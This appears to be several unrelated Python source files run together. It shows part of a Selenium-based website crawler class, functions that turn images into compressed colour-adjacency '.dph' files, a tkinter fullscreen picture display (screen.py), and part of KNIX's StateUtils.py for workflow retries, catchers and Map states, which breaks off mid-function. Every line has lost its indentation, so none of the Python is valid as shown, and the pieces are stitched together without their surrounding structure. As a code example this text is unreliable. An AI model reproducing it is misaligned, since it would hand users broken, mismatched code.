# TODO: compute max run time based on timeout and website list, have display of estimated time of completion, etc.
def __init__(self, chrome_count):
self.drivers = [threading.Thread(target=self.driver_thread_function) for __ in xrange(chrome_count)]
self.driver_functionality = None
self.page_timeout = 30 # default 30 seconds
self.is_headless = True # default headless mode
self.use_ublock = True # default use ublock
self.image_handler_thread = threading.Thread(target=self.image_handler_thread_function)
self.image_handler_functionality = None
self.max_queue_length = 0
self.source_enabled = False
self.source_handler_thread = threading.Thread(target=self.source_handler_thread_function)
self.source_handler_functionality = None
self.websites = []
self.timeout_sites = []
def image_handler(self, funct):
def wrapper():
return funct()
self.image_handler_functionality = wrapper
return None
def image_handler_thread_function(self):
if self.image_handler_functionality is None:
raise NotImplementedError('Image Handler functionality must be defined, i.e. @Penguin.image_handler')
try:
for i in xrange(10000000): # ten million
state, queue_length = self.image_handler_functionality()
self.max_queue_length = max(queue_length, self.max_queue_length)
if state is False:
break
finally:
pass
def source_handler(self, funct):
def wrapper():
return funct()
self.source_handler_functionality = wrapper
return None
def source_handler_thread_function(self):
if not self.source_enabled:
raise ValueError('Source is not enabled for this client')
if self.source_handler_functionality is None:
raise NotImplementedError('Source Handler functionality must be defined, i.e. @Penguin.source_handler')
try:
for i in xrange(10000000): # ten million
state = self.source_handler_functionality()
if state is False:
break
finally:
pass
def driver(self, funct):
def wrapper(websites, driver, timeouts):
return funct(websites, driver, timeouts)
self.driver_functionality = wrapper
return None
def load_driver(self):
options = Options()
if self.use_ublock:
ublock0_path = get_path('uBlock0', target='uBlock0.chromium')
options.add_argument('load-extension=' + ublock0_path)
if self.is_headless:
options.add_argument('window-size=1300,750')
options.add_argument('window-position=2000,0')
try:
chromedriver_path = get_path('chromedriver', target='chromedriver.exe')
driver = Chrome(executable_path=chromedriver_path, chrome_options=options)
except ValueError:
driver = Chrome(chrome_options=options)
driver.set_page_load_timeout(self.page_timeout)
return driver
def driver_thread_function(self):
if self.driver_functionality is None:
raise NotImplementedError('Driver functionality must be defined, i.e. @Penguin.driver')
driver = self.load_driver()
try:
for i in xrange(5000000): # five million, gracefully exits after five million iterations
continue_state = self.driver_functionality(self.websites, driver, self.timeout_sites)
if continue_state is False:
break
finally:
driver.quit()
def run(self):
start = time.time()
locked_source_enabled = self.source_enabled
if not os.path.exists('.temp'):
os.makedirs('.temp')
if locked_source_enabled:
if not os.path.exists('.temp/source'):
os.makedirs('.temp/source')
if not os.path.exists('.temp/image'):
os.makedirs('.temp/image')
if not os.path.exists('data'):
os.makedirs('data')
self.image_handler_thread.start()
if locked_source_enabled:
self.source_handler_thread.start()
for t in self.drivers:
t.start()
for t in self.drivers:
t.join()
while len(os.listdir('.temp/image')) != 0:
time.sleep(.1)
shutil.rmtree('.temp/image')
self.image_handler_thread.join()
if locked_source_enabled:
while len(os.listdir('.temp/source')) != 0:
time.sleep(.1)
shutil.rmtree('.temp/source')
self.source_handler_thread.join()
shutil.rmtree('.temp')
return time.time() - start
def ublock(self, use_ublock=True):
self.use_ublock = use_ublock
def headless(self, is_headless=True):
self.is_headless = is_headless
def timeout(self, seconds):
self.page_timeout = seconds
def source(self, enable=True):
self.source_enabled = enable
def save_timeouts(self, file='data/timeouts.csv'):
with open(file, 'a') as timeout_log:
for line in self.timeout_sites:
timeout_log.write(line[0] + ', ' + line[1] + '\n')
def add_websites(self, start, end):
self.websites.extend(load_sites(start, end))
return self
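# Hedged usage sketch (illustrative only; the handler bodies and the website
# range below are assumptions, not part of the original project). A Penguin
# client is configured through its decorator methods and then run:
#
#   crawler = Penguin(chrome_count=2)
#   crawler.timeout(20)
#   crawler.headless(True)
#   crawler.add_websites(0, 100)
#
#   @crawler.driver
#   def visit(websites, driver, timeouts):
#       if not websites:
#           return False                 # stop this driver thread
#       url, name = websites.pop()
#       try:
#           driver.get(url)
#       except Exception:
#           timeouts.append((url, name))
#       return True
#
#   @crawler.image_handler
#   def handle_images():
#       queue = os.listdir('.temp/image')
#       # ... process queued screenshots here ...
#       return (len(queue) > 0 or len(crawler.websites) > 0), len(queue)
#
#   elapsed = crawler.run()
#   crawler.save_timeouts()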
def get_path(resource, target, version='LATEST'):
try:
os.listdir(STATIC_RESOURCE_PATH)
except OSError:
raise ValueError('\'%s\' is not a valid path to the static resources' % STATIC_RESOURCE_PATH)
if resource not in os.listdir(STATIC_RESOURCE_PATH):
raise ValueError('Specified resource not in the static directory')
available_versions = os.listdir(STATIC_RESOURCE_PATH + '/' + resource)
if len(available_versions) == 0:
raise ValueError('No available resources found in the static/' + resource + ' directory')
relative_path = os.getcwd().replace('\\', '/')
if version == 'LATEST':
return relative_path + '/' + STATIC_RESOURCE_PATH + '/' + resource + '/%s/%s' % (available_versions[-1], target)
else:
if 'version_%s' % version in available_versions:
return relative_path + '/' + STATIC_RESOURCE_PATH + '/' + resource + '/version_%s/%s' % (version, target)
else:
raise ValueError('Specified version not found in the static/' + resource + ' directory')
def load_sites(a, b):
website_path = get_path('websites', target='websites.csv')
site_list = []
with open(website_path, 'r') as f:
for i, line in enumerate(f):
if a <= i < b:
full_domain = line.rstrip('\n')
base_domain = full_domain.split('.')[0]
site_list.append(('http://' + full_domain, base_domain))
elif i >= b:
break
return site_list
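# Illustrative example (the csv line is an assumption): a websites.csv line such
# as "google.com" yields ('http://google.com', 'google'), so load_sites(0, 100)
# returns tuples for the first 100 lines of static/websites/<version>/websites.csv.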
def convert_adjacency_to_dph(adj_filename, imagename, dph_filename):
header, adj_list = parse_adjacency_file(adj_filename, imagename)
sorted_pair_list = convert_adjlist_to_pairlist(header, adj_list)
difference_compressed_pair_list = difference_compression(sorted_pair_list)
write_pair_list_hex(dph_filename, header, difference_compressed_pair_list)
# TODO: add header value catch statements
def convert_dph_to_adjacency(dph_filename, imagename, adj_filename):
header, diff_pair_hex_list = parse_dph_file(dph_filename, imagename)
difference_decompressed_pair_list = difference_decompression(diff_pair_hex_list)
adj_list = convert_pairlist_to_adjlist(header, difference_decompressed_pair_list)
write_adj_list(adj_filename, header, adj_list)
def write_adj_list(filename, head, adj_list):
with open(filename, 'w') as adj_file:
adj_file.write(str(head) + '\n')
for neighbors in adj_list:
adj_file.write(str(neighbors) + '\n')
def write_pair_list_hex(filename, head, pair_list):
delimiter = '.'
head['delimiter'] = delimiter
with open(filename, 'w') as dph_file:
dph_file.write(str(head) + '\n')
for tuple in pair_list:
dph_file.write(hex_blanking_format(tuple, delimiter) + '\n')
def hex_blanking_format(t, d):
s = ''
if t[0] == 0:
s += d
else:
s += str(hex(t[0])) + d
if t[1] == 0:
s += d
else:
s += str(hex(t[1])) + d
if t[2] != 1:
s += str(hex(t[2]))
return s.replace('0x', '')
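# Worked example of the blanking format: zero coordinates and unit weights are
# blanked to keep the file small, e.g.
#   hex_blanking_format((0, 10, 1), '.')  -> '.a.'     (a == 0 and weight == 1 omitted)
#   hex_blanking_format((255, 0, 3), '.') -> 'ff..3'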
def difference_compression(pair_list):
last_a = last_b = 0
for i in xrange(len(pair_list)):
temp = pair_list[i]
pair_list[i] = (temp[0] - last_a, temp[1] - last_b, temp[2])
last_a = temp[0]
last_b = temp[1]
return pair_list
def difference_decompression(pair_list):
last_a = last_b = 0
for i in xrange(len(pair_list)):
temp = pair_list[i]
pair_list[i] = (temp[0] + last_a, temp[1] + last_b, temp[2])
last_a += temp[0]
last_b += temp[1]
return pair_list
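# Worked round-trip example: difference_compression stores each sorted pair as a
# delta from the previous pair, and difference_decompression reverses it, e.g.
#   difference_compression([(2, 5, 1), (4, 7, 2), (9, 7, 1)])
#     -> [(2, 5, 1), (2, 2, 2), (5, 0, 1)]
#   difference_decompression([(2, 5, 1), (2, 2, 2), (5, 0, 1)])
#     -> [(2, 5, 1), (4, 7, 2), (9, 7, 1)]
# (both functions modify the list in place and also return it)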
def color_compression(pixel):
red = pixel[0]
green = pixel[1]
blue = pixel[2]
int_rep_color = ((red / 4) * (64 ** 2)) + ((green / 4) * 64) + (blue / 4)
return int_rep_color
def color_decompression(int_rep_color):
blue = (int_rep_color % 64) * 4
green = ((int_rep_color / 64) % 64) * 4
red = (int_rep_color / (64 ** 2)) * 4
return red, green, blue
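# Worked example (using this module's Python 2 integer division): each RGB channel
# is quantised to 64 levels, so the mapping is lossy by at most 3 per channel, e.g.
#   color_compression((200, 100, 50))  -> 50*4096 + 25*64 + 12 = 206412
#   color_decompression(206412)        -> (200, 100, 48)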
# TODO: error checking with header
def convert_pairlist_to_adjlist(head, pair_list):
adjacency_list = [[] for __ in xrange(COMPRESSED_COLOR_SPACE)]
for edge in pair_list:
adjacency_list[edge[0]] += [(edge[1], edge[2])]
return adjacency_list
# TODO: check for total weight head['total_weight']
def convert_adjlist_to_pairlist(head, alist):
raw_pair_list = []
for a in xrange(len(alist)):
for tuple in alist[a]:
edge_pair = sorted([a, tuple[0]])
raw_pair_list += [(edge_pair[0], edge_pair[1], tuple[1])]
if len(raw_pair_list) != head['edges']:
pass # raise FileHeaderValueError(head['image'], 'edges', head['edges'], len(raw_pair_list))
return sorted(raw_pair_list)
def parse_adjacency_file(filename, imagename):  # parameter order matches the call in convert_adjacency_to_dph
with open(filename, 'r') as adj_file:
header_line = adj_file.readline().replace('\n', '')
header_dictionary = ast.literal_eval(header_line)
if header_dictionary['image'] != imagename:
pass # TODO: fix -> raise ValueError(imagename, 'image', imagename, header_dictionary['image'])
adjacency_list = []
for i, l in enumerate(adj_file):
adjacency_list += [ast.literal_eval(l.replace('\n', ''))]
return header_dictionary, adjacency_list
def parse_dph_file(filename, imagename):  # parameter order matches the call in convert_dph_to_adjacency
with open(filename, 'r') as dph_file:
header_line = dph_file.readline().replace('\n', '')
header_dictionary = ast.literal_eval(header_line)
if header_dictionary['image'] != imagename:
pass # TODO: fix -> raise ValueError(imagename, 'image', imagename, header_dictionary['image'])
dph_list = []
for i, l in enumerate(dph_file):
split_line = l.replace('\n', '').split(header_dictionary['delimiter'])
a = b = 0
c = 1
if split_line[0] != '':
a = int(split_line[0], 16)
if split_line[1] != '':
b = int(split_line[1], 16)
if split_line[2] != '':
c = int(split_line[2], 16)
dph_list += [(a, b, c)]
return header_dictionary, dph_list
def add_color_edge(a_list, a, b):
x, y = sorted([a, b])
for neighbor in a_list[x]:
if neighbor[0] == y:
neighbor[1] += 1
return # this caused an error in original code (must be inside if statement, not after)
else:
a_list[x].append([y, 1])
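# Illustrative example: repeated edges accumulate weight instead of duplicating
# entries, e.g. with a_list = [[] for __ in xrange(4)]:
#   add_color_edge(a_list, 2, 1)   # a_list[1] == [[2, 1]]
#   add_color_edge(a_list, 1, 2)   # a_list[1] == [[2, 2]]  (weight incremented)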
# builds a .dph file from an image file (no value is currently returned)
def imagefile_to_dphfile(image_filename, imagename, dph_filename):
adjacency_list = [[] for __ in xrange(COMPRESSED_COLOR_SPACE)]
list1 = []
list2 = []
weight_count = 0
im = Image.open(image_filename).convert('RGB')
pixel = im.load()
width, height = im.size
# note: the image must stay open while pixels are read below; closing it here would invalidate the pixel access object
for y in xrange(0, height, 10):
for x in xrange(0, width, 10):
rgb_pixel = pixel[x, y]
cur_x = x / 10
cur_y = y / 10
list1.append(color_compression(rgb_pixel))
if cur_x != 0:
add_color_edge(adjacency_list, list1[cur_x], list1[cur_x - 1])
weight_count += 1
if cur_y != 0:
add_color_edge(adjacency_list, list1[cur_x], list2[cur_x])
weight_count += 1
list2 = list(list1)
list1 = []
edge_count = 0
for neighbor_list in adjacency_list:
edge_count += len(neighbor_list)
header = {'delimiter': '.', 'image': imagename, 'edges': edge_count, 'total_weight': weight_count}
sorted_pair_list = convert_adjlist_to_pairlist(header, adjacency_list)
difference_compressed_pair_list = difference_compression(sorted_pair_list)
write_pair_list_hex(dph_filename, header, difference_compressed_pair_list)
|
screen.py
|
import os
import tkinter as tk
import time
from threading import Thread
from config import config
class Screen:
def __init__(self, initial_picture="init.gif"):
"""
initialise the class and show the window; the default image is configurable via initial_picture
"""
self.imgPath = os.path.join(config.PICTUREPATH, initial_picture)
self.__show_window()
def __open_window(self):
"""
private method to display the window fullscreen on the Pi
:return: -
"""
# Whatever buttons, etc
self.root = tk.Tk()
self.root.geometry('%dx%d+%d+%d' % (800, 480, 0, 0))
self.root.attributes('-alpha', 0.0) # For icon
self.root.lower()
self.root.iconify()
self.window = tk.Toplevel(self.root)
self.window.geometry("800x480") # Whatever size
self.window.overrideredirect(1) # Remove border
self.window.attributes('-topmost', 1)
self.photo = tk.PhotoImage(file=self.imgPath)
self.label = tk.Label(self.window, image=self.photo)
self.label.image = self.photo # keep a reference!
self.label.grid(row=3, column=1, padx=5, pady=5)
self.label.pack(fill=tk.BOTH, expand=1)
self.root.after(100, self.__change_picture_callback)
self.window.mainloop()
def __change_picture_callback(self):
"""
callback used to update the picture (tk-internal rescheduling)
:return:
"""
self.photo = tk.PhotoImage(file=self.imgPath)
self.label.configure(image=self.photo)
self.image = self.photo
# reschedule event in 100 ms
self.root.after(100, self.__change_picture_callback)
def __show_window(self):
"""
start the window in a separate thread and wait for it to initialise
:return:
"""
self.t = Thread(target=self.__open_window)
self.t.start()
# time to start thread
time.sleep(2)
def change_picture(self, picture_path):
"""
method to change the displayed picture
:param picture_path: path string to the new image
:return: -
"""
self.imgPath = picture_path
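# Hedged usage sketch (illustrative only; the gif names are assumptions and must
# exist under config.PICTUREPATH):
#
#   screen = Screen()                                   # shows init.gif fullscreen
#   screen.change_picture(os.path.join(config.PICTUREPATH, "smile.gif"))
#   # the 100 ms callback re-reads self.imgPath, so the new picture appears shortly after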
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
_instcnt = 0 # instance counter
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
#self._mapStateInfo = {}
#self.batchAlreadyLaunched = []
#self.currentMapInputMetadata = {} # initialise with empty dicts
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__= func.__name__
return helper
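# Illustrative sketch of call_counter: it is a plain counting decorator, e.g.
#   @call_counter            # inside the class body (or StateUtils.call_counter outside)
#   def f():
#       pass
#   f(); f()
#   f.calls  # -> 2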
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
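# Illustrative example (values are assumptions): with
#   cat_list = [{"ErrorEquals": ["States.TaskFailed", "KeyError"],
#                "ResultPath": "$.error", "Next": "HandleFailure"}]
# find_cat_data(KeyError("missing"), cat_list) returns ("HandleFailure", "$.error"),
# because the exception's class name matches an ErrorEquals entry; with no match
# it returns the defaults ([], "$").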
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if err in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
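# Illustrative example (values are assumptions): with
#   ret_list = [{"ErrorEquals": ["States.Timeout"], "MaxAttempts": 3,
#                "IntervalSeconds": 2, "BackoffRate": 1.5}]
# find_ret_data("States.Timeout", ret_list) returns (3, 2, 1.5); errors with no
# matching entry fall through to the defaults (1, 1, 1.0).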
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
try:
#self._logger.debug("Current Function Type: " + self.functionstatetype)
#self._logger.debug("StateUtils: Input Path Dict: " + json.dumps(self.input_path_dict))
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
#t_start = time.time()
function_input = self.process_input_path(self.input_path_dict, function_input)
#t_end = time.time()
#timestr = "%.15f" % ((t_end-t_start)*1.0E9)
#self._logger.debug("Input Path Processing Time (ns): " + timestr)
#self._logger.debug("StateUtils: Processed Value: " + json.dumps(function_input))
return function_input
except Exception:
#self._logger.exception("Input path processing exception")
#sys.stdout.flush()
#os._exit(1)
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
raise Exception(error_type)
return function_output
#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParameters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# translated from Parallel
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
#assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
k_list = [total_branch_count]
counter_name_trigger_metadata = {"k-list": k_list, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["k_list"] = k_list
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
self._logger.debug("[StateUtils] evaluateMapState: ")
self._logger.debug("\t CounterName:" + CounterName)
self._logger.debug("\t counter_name_topic:" + counter_name_topic)
self._logger.debug("\t counter_name_key: " + counter_name_key)
self._logger.debug("\t counter_name_trigger_metadata:" + json.dumps(counter_name_trigger_metadata))
self._logger.debug("\t counter_name_value_metadata:" + json.dumps(counter_name_value_metadata))
self._logger.debug("\t counter_name_value_encoded: " + json.dumps(counter_name_value))
